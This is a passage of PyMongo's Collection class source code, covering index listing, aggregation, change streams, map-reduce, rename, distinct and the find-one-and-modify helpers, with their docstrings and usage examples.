SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
def _cmd(session, server, sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
return self.__database.client._retryable_read(
_cmd, read_pref, session)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def _aggregate(self, aggregation_command, pipeline, cursor_class, session,
explicit_session, **kwargs):
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor", True))
cmd = aggregation_command(
self, cursor_class, pipeline, kwargs, explicit_session,
user_fields={'cursor': {'firstBatch': 1}}, use_cursor=use_cursor)
return self.__database.client._retryable_read(
cmd.get_cursor, cmd.get_read_preference(session), session,
retryable=not cmd._performs_write)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`, except when ``$out`` or ``$merge`` are used, in
which case :attr:`~pymongo.read_preferences.ReadPreference.PRIMARY`
is used.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.9
Apply this collection's read concern to pipelines containing the
`$out` stage when connected to MongoDB >= 4.2.
Added support for the ``$merge`` pipeline stage.
Aggregations that write always use read preference
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY`.
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(_CollectionAggregationCommand,
pipeline,
CommandCursor,
session=s,
explicit_session=session is not None,
**kwargs)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: aggregate_raw_batches does not support sessions or auto
encryption.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
# OP_MSG is required to support encryption.
if self.__database.client._encrypter:
raise InvalidOperation(
"aggregate_raw_batches does not support auto encryption")
return self._aggregate(_CollectionRawAggregationCommand,
pipeline,
RawBatchCommandCursor,
session=None,
explicit_session=False,
**kwargs)
def watch(self, pipeline=None, full_document=None, resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None, start_after=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'updateLookup'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): A resume token. If provided, the
change stream will start returning changes that occur directly
after the operation specified in the resume token. A resume token
is the _id value of a change document.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `start_after` (optional): The same as `resume_after` except that
`start_after` can resume notifications after an invalidate event.
This option and `resume_after` are mutually exclusive.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.9
Added the ``start_after`` parameter.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session,
start_after)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation,
user_fields={'retval': 1})["retval"]
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes(session) as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
def _cmd(session, server, sock_info, slave_ok):
return self._command(
sock_info, cmd, slave_ok, read_concern=self.read_concern,
collation=collation, session=session,
user_fields={"values": 1})["values"]
return self.__database.client._retryable_read(
_cmd, self._read_preference_for(session), session)
def _map_reduce(self, map, reduce, out, session, read_pref, **kwargs):
"""Internal mapReduce helper."""
cmd = SON([("mapReduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in out
if inline:
user_fields = {'results': 1}
else:
user_fields = None
read_pref = ((session and session._txn_read_preference())
or read_pref)
with self.__database.client._socket_for_reads(read_pref, session) as (
sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and
('readConcern' not in cmd) and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
return self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session,
user_fields=user_fields)
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
response = self._map_reduce(map, reduce, out, session,
ReadPreference.PRIMARY, **kwargs)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
res = self._map_reduce(map, reduce, {"inline": 1}, session,
self.read_preference, **kwargs)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
collation=collation, session=session,
retryable_write=retryable_write,
user_fields=_FIND_AND_MODIFY_DOC_FIELDS)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count_documents({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count_documents({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
{u'_id': 665, u'done': False, u'count': 25}}
Returns ``None`` if no document matches the filter.
>>> db.test.find_one_and_update(
... {'_exists': False}, {'$inc': {'count': 1}})
When the filter matches, by default :meth:`find_one_and_update`
returns the original version of the document before the update was
applied. To return the updated (or inserted in the case of
*upsert*) version of the document instead, use the *return_document*
option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
